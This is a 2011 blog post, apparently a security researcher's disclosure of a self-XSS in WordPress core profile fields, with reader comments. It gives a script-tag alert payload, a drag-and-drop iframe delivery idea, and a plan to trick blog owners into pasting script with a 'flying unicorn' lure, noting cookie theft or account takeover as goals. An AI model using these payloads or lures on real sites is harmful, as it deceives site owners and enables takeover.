0day XSS in wordpress core

I found a self-XSS in the wordpress core the other day, when you manage to succesfully exploit this vulnerability only imagination can stop you from owning the wordpress installation.

These self-XSS'es require some more user interaction than the classic click-bam-boom effect of a XSS.

The classic way of triggering the "bam" (exploitation of a XSS vulnerability) is by very properly slicing an iframe based on the victim's browser resolution and changing the CSS of the iframe to make it look like a part of the page and then convincing the victim to drag something to that sliced iframe.

The boom effect will automatically trigger after the bam was succesful in any situation which is the execution of the preferred payload - in our case an innocent Javascript alert box but which could just as well been DOM requests to change user passwords, add accounts, install malicious plugins or the process of stealing cookies.

The draggable element contains the payload, the code, the Javascript you would like to execute.
Here is for example a draggable image which contains the not too malicious payload of "<script>alert(123);</script>".

')" src='http://h.ackack.net/img/Hacker_Emblem.jpg'>

The major problem with this XSS is that we can't create an iframe to the administrator page of the blog, so we would have to open a pop-up to the administrator page of the victim's blog and convince the victim to drag and drop the image, div, code or whatever you came up with to the administrator page of wordpress.

A possible scenario would play with the fact they like cool tricks, easter eggs and unicorns and that most WordPress blog owners are poorly educated in IT.
You tell them that by dragging an element to one of the fields I am about to expose you can get a flying unicorn on your screen, you never know how stupid people are - the "make Google logo move" trick which is totally not malicious and being used by users all over the world.

For the people who don't know it this is the `cool` trick which is used/shared by a lot of people, here it is:

Step 1: Go to www.google.com, it must be google.com and not google.ro or google.tu or other google.
Step 2: Delete the URL address in the navigation bar. Select the address, right click on the selection and delete.
Step 3: Copy and Paste in the Navigation bar this code:

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
Step 4: Hit enter.
Step 5: Watch Google Dance like Mad.
Step 6: This can be applied for any Website.
Step 7: Get over the pain because you just got slapped in the face by me because of your stupicity

That proofs that my "easter egg" idea might work pretty good.

The vulnerability itself exists in the following places of WordPress:

http://h.ackack.net/wp-admin/user-edit.php?user_id=

http://h.ackack.net/wp-admin/profile.php

By putting Javascript inside the input elements "first_name", "last_name" or "nickname" the self-XSS will trigger 3 times.

If you drag the image displayed earlier in 1 of these elements the XSS will trigger, or just by inserting "<script>alert(123);</script>" inside one of these elements you get the same effect.

As you can imagine we can pull of a generic way of social engineering people to get their blog pwned.

Step 1: Go to the http://<your website>/wp-admin/profile.php, log in if the page asks for it
Step 2: Put this code inside your "First name" field:

<script>alert(123);</script>

Step 3: See unicorns flying over your screen!

Here is an image of the XSS in action:

This vulnerability exists from the latest until somewhere unknown back in time.

Jelmer de Hen

Hello, I am Jelmer born in 1991 and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.

8 Comments

1. 

   27/06/2011 @ 12:18

   knull says:

   i dont see this becoming much of an issue for wordpress users in general, except for the most stupid of wp admins of course. flying unicorns ftw!

2. 27/06/2011 @ 14:21

   WordPress User Data Minor Self-XSS | Pressecure says:

   [...] de Hen has posted an unpatched minor vulnerability in the WordPress core, version 3.1.3 and possibly earlier versions. It allows for cross-site [...]

3. 27/06/2011 @ 16:55

   WordPress: Security Patch untuk XSS Vulnerable | Eizil.com says:

   [...] ini ditulis selepas selesai mencuba security patch untuk mengelakkan xss vulnerable yang telah dikongsi oleh bro @AffanRuslan di twitter kepada aku lewat petang tadi. Disebabkan [...]

4. 

   27/06/2011 @ 17:57

   at says:

   that doesent quite seem to work...

5. 

   27/06/2011 @ 18:24

   RandyProton says:

   cool move bro im still learning bout security, but i found ur post very interesting, even though, i cant run the script on firefox 4.0.1, haven't tested in other browsers.

   @ethicalhack3r Ryan Dewhurst brought me here

6. 29/06/2011 @ 08:22

   Episode 417 – WordPress 0day, Hacked Gmail, Google Shares, Dropdox, Firefox 4 EOL, MS “Legal Intercept” & Cyber-defense Bandwagon » 華人資安論壇與資安認知教育網誌 says:

   [...] Source: http://h.ackack.net/0day-xss-in-wordpress-core.html [...]

7. 

   16/07/2011 @ 11:12

   Root says:

   Can we be friends?

8. 16/12/2011 @ 08:38

   Web Hacking 2011 (Blog Attacks) | Villacorp says:

   [...] XSS in wordpress core http://h.ackack.net/0day-xss-in-wordpress-core.html Vulnerabilidad "Cross Site Scripting". Como demostré en el Curso Master Hacking, este tipo de [...]